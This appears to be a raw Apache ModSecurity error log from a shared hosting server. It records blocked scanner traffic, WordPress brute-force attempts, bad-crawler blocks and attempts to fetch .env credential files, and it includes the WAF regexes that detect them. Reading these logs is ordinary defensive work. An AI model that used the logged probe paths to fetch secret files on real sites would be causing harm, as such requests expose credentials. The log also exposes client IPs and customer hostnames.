[Tue May 26 14:39:16.782755 2026] [security2:error] [pid 626747:tid 626949] [client 43.173.174.179:46434] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjOxVF8Qmdmw_OMfIIvAAAAVI"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:18.268084 2026] [security2:error] [pid 626747:tid 626992] [client 43.173.175.25:36550] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjPBVF8Qmdmw_OMfII4wAAAX0"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:18.800335 2026] [security2:error] [pid 626747:tid 626928] [client 192.178.8.100:58487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVjPhVF8Qmdmw_OMfIJJAAAAT0"]
[Tue May 26 14:39:18.818930 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjPhVF8Qmdmw_OMfIJFwAAAUg"]
[Tue May 26 14:39:19.045657 2026] [security2:error] [pid 626747:tid 626930] [client 192.178.8.100:49199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVjPxVF8Qmdmw_OMfIJKAAAAT8"]
[Tue May 26 14:39:19.656494 2026] [security2:error] [pid 626747:tid 626935] [client 43.173.181.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjPhVF8Qmdmw_OMfIJDAAAAUQ"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:20.304660 2026] [security2:error] [pid 626747:tid 626983] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjPxVF8Qmdmw_OMfIJRAAAAXQ"]
[Tue May 26 14:39:20.401696 2026] [security2:error] [pid 626747:tid 626889] [client 43.173.181.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjPhVF8Qmdmw_OMfIJIwAAARY"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:21.921207 2026] [security2:error] [pid 626747:tid 626967] [client 192.186.133.40:37126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVjQRVF8Qmdmw_OMfIJbwAAAWQ"], referer: https://anujtradingco.com
[Tue May 26 14:39:22.280604 2026] [security2:error] [pid 626747:tid 626770] [remote 74.7.241.58:57594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVjQhVF8Qmdmw_OMfIJiQABNxY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:39:22.322286 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjQhVF8Qmdmw_OMfIJjQAAAX0"]
[Tue May 26 14:39:22.323973 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53826] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjQhVF8Qmdmw_OMfIJjQAAAX0"]
[Tue May 26 14:39:22.341304 2026] [core:error] [pid 626747:tid 626938] [client 95.108.213.113:33994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:39:22.341323 2026] [core:error] [pid 626747:tid 626938] [client 95.108.213.113:33994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:39:22.712589 2026] [security2:error] [pid 626747:tid 626971] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjQhVF8Qmdmw_OMfIJjAAAAWg"]
[Tue May 26 14:39:24.868304 2026] [security2:error] [pid 626747:tid 626917] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjRBVF8Qmdmw_OMfIJzwAAATI"]
[Tue May 26 14:39:25.767905 2026] [security2:error] [pid 626747:tid 626805] [remote 5.78.119.122:47014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVjRRVF8Qmdmw_OMfIJ8QABKTk"]
[Tue May 26 14:39:26.325554 2026] [security2:error] [pid 626747:tid 626967] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjRRVF8Qmdmw_OMfIJ_gAAAWQ"]
[Tue May 26 14:39:27.616691 2026] [security2:error] [pid 626747:tid 626909] [client 202.76.171.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjRxVF8Qmdmw_OMfIKIgAAASo"]
[Tue May 26 14:39:29.152588 2026] [security2:error] [pid 626747:tid 626993] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjSBVF8Qmdmw_OMfIKWQAAAX4"]
[Tue May 26 14:39:29.551601 2026] [security2:error] [pid 626747:tid 626990] [client 64.89.161.160:64738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahVjSRVF8Qmdmw_OMfIKawAAAXs"]
[Tue May 26 14:39:31.105300 2026] [security2:error] [pid 626747:tid 626978] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjShVF8Qmdmw_OMfIKtQAAAW8"]
[Tue May 26 14:39:31.642020 2026] [security2:error] [pid 626747:tid 626914] [client 43.173.182.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVjSxVF8Qmdmw_OMfIK8AAAAS8"]
[Tue May 26 14:39:32.792110 2026] [security2:error] [pid 626747:tid 626892] [client 202.141.83.254:19880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjTBVF8Qmdmw_OMfILDwAAARk"]
[Tue May 26 14:39:32.792257 2026] [security2:error] [pid 626747:tid 626892] [client 202.141.83.254:19880] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjTBVF8Qmdmw_OMfILDwAAARk"]
[Tue May 26 14:39:33.359939 2026] [security2:error] [pid 626747:tid 626788] [remote 5.78.119.122:53048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVjTRVF8Qmdmw_OMfILHwABeig"]
[Tue May 26 14:39:33.536656 2026] [security2:error] [pid 626747:tid 627002] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjTRVF8Qmdmw_OMfILGAAAAYc"]
[Tue May 26 14:39:33.835661 2026] [security2:error] [pid 626747:tid 626983] [client 45.205.1.28:49194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahVjTRVF8Qmdmw_OMfILMQAAAXQ"]
[Tue May 26 14:39:34.727121 2026] [security2:error] [pid 626747:tid 626928] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjThVF8Qmdmw_OMfILRQAAAT0"]
[Tue May 26 14:39:35.584111 2026] [security2:error] [pid 626747:tid 626879] [client 114.119.139.115:24889] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVjTxVF8Qmdmw_OMfILgwAAAQw"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&manufacturer_id=11&product_id=112&page=9
[Tue May 26 14:39:36.957611 2026] [security2:error] [pid 626747:tid 626884] [client 114.119.136.243:21745] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kexcouriers.com"] [uri "/get-a-quate.html"] [unique_id "ahVjUBVF8Qmdmw_OMfILrgAAARE"], referer: https://www.kexcouriers.com/privacy-policy.html
[Tue May 26 14:39:37.600472 2026] [security2:error] [pid 626747:tid 626902] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjURVF8Qmdmw_OMfILuAAAASM"]
[Tue May 26 14:39:38.267333 2026] [security2:error] [pid 626747:tid 626821] [remote 178.104.164.71:47784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVjUhVF8Qmdmw_OMfIL1AABKUk"]
[Tue May 26 14:39:39.510467 2026] [security2:error] [pid 626747:tid 626986] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjUxVF8Qmdmw_OMfIMAQAAAXc"]
[Tue May 26 14:39:41.471374 2026] [security2:error] [pid 626747:tid 626970] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjVRVF8Qmdmw_OMfIMPgAAAWc"]
[Tue May 26 14:39:42.930392 2026] [security2:error] [pid 626747:tid 626913] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjVhVF8Qmdmw_OMfIMYQAAAS4"]
[Tue May 26 14:39:43.158220 2026] [security2:error] [pid 626747:tid 626899] [client 23.229.16.58:47554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVjVxVF8Qmdmw_OMfIMcgAAASA"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 14:39:43.312867 2026] [security2:error] [pid 626747:tid 626977] [client 202.141.83.254:19871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjVxVF8Qmdmw_OMfIMcwAAAW4"]
[Tue May 26 14:39:43.312966 2026] [security2:error] [pid 626747:tid 626977] [client 202.141.83.254:19871] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjVxVF8Qmdmw_OMfIMcwAAAW4"]
[Tue May 26 14:39:45.039243 2026] [security2:error] [pid 626747:tid 626983] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjWBVF8Qmdmw_OMfIMkgAAAXQ"]
[Tue May 26 14:39:49.107878 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjXBVF8Qmdmw_OMfIM8AAAAUg"]
[Tue May 26 14:39:50.381860 2026] [security2:error] [pid 626747:tid 626951] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjXRVF8Qmdmw_OMfINGwAAAVQ"]
[Tue May 26 14:39:52.050603 2026] [security2:error] [pid 626747:tid 626961] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjXxVF8Qmdmw_OMfINUgAAAV4"]
[Tue May 26 14:39:53.581175 2026] [security2:error] [pid 626747:tid 626943] [client 202.141.83.254:53852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjYRVF8Qmdmw_OMfINogAAAUw"]
[Tue May 26 14:39:53.581289 2026] [security2:error] [pid 626747:tid 626943] [client 202.141.83.254:53852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjYRVF8Qmdmw_OMfINogAAAUw"]
[Tue May 26 14:39:53.784062 2026] [security2:error] [pid 626747:tid 626981] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjYRVF8Qmdmw_OMfINnwAAAXI"]
[Tue May 26 14:39:55.392777 2026] [security2:error] [pid 626747:tid 626878] [client 195.178.110.34:57634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVjYxVF8Qmdmw_OMfIN0wAAAQs"]
[Tue May 26 14:39:56.007541 2026] [security2:error] [pid 626747:tid 626883] [client 154.161.32.97:57048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjYxVF8Qmdmw_OMfIN5QAAARA"]
[Tue May 26 14:39:56.007673 2026] [security2:error] [pid 626747:tid 626883] [client 154.161.32.97:57048] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjYxVF8Qmdmw_OMfIN5QAAARA"]
[Tue May 26 14:39:56.158990 2026] [security2:error] [pid 626747:tid 627002] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjYxVF8Qmdmw_OMfIN4QAAAYc"]
[Tue May 26 14:39:56.913640 2026] [proxy:error] [pid 626747:tid 626993] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:56.913702 2026] [proxy_http:error] [pid 626747:tid 626993] [client 208.84.100.238:55990] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:56.914300 2026] [proxy:error] [pid 626747:tid 626993] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:56.914332 2026] [proxy_http:error] [pid 626747:tid 626993] [client 208.84.100.238:55990] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:57.253036 2026] [proxy:error] [pid 626747:tid 626984] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:57.253090 2026] [proxy_http:error] [pid 626747:tid 626984] [client 208.84.100.238:55434] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:57.253690 2026] [proxy:error] [pid 626747:tid 626984] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:57.253742 2026] [proxy_http:error] [pid 626747:tid 626984] [client 208.84.100.238:55434] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.114557 2026] [security2:error] [pid 626747:tid 626998] [client 208.84.100.238:56012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVjZhVF8Qmdmw_OMfIONQAAAYM"]
[Tue May 26 14:39:58.114679 2026] [proxy:error] [pid 626747:tid 626932] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.114738 2026] [proxy_http:error] [pid 626747:tid 626932] [client 208.84.100.238:56084] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.114853 2026] [proxy:error] [pid 626747:tid 626991] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.114903 2026] [proxy_http:error] [pid 626747:tid 626991] [client 208.84.100.238:56186] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.115084 2026] [proxy:error] [pid 626747:tid 626963] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.115152 2026] [proxy_http:error] [pid 626747:tid 626963] [client 208.84.100.238:56172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.115264 2026] [security2:error] [pid 626747:tid 626973] [client 208.84.100.238:56054] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVjZhVF8Qmdmw_OMfIOMwAAAWo"]
[Tue May 26 14:39:58.115484 2026] [security2:error] [pid 626747:tid 626886] [client 208.84.100.238:56038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVjZhVF8Qmdmw_OMfIOOQAAARM"]
[Tue May 26 14:39:58.115908 2026] [security2:error] [pid 626747:tid 627002] [client 208.84.100.238:56050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVjZhVF8Qmdmw_OMfIONAAAAYc"]
[Tue May 26 14:39:58.115273 2026] [proxy:error] [pid 626747:tid 626981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.116830 2026] [proxy_http:error] [pid 626747:tid 626981] [client 208.84.100.238:56108] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
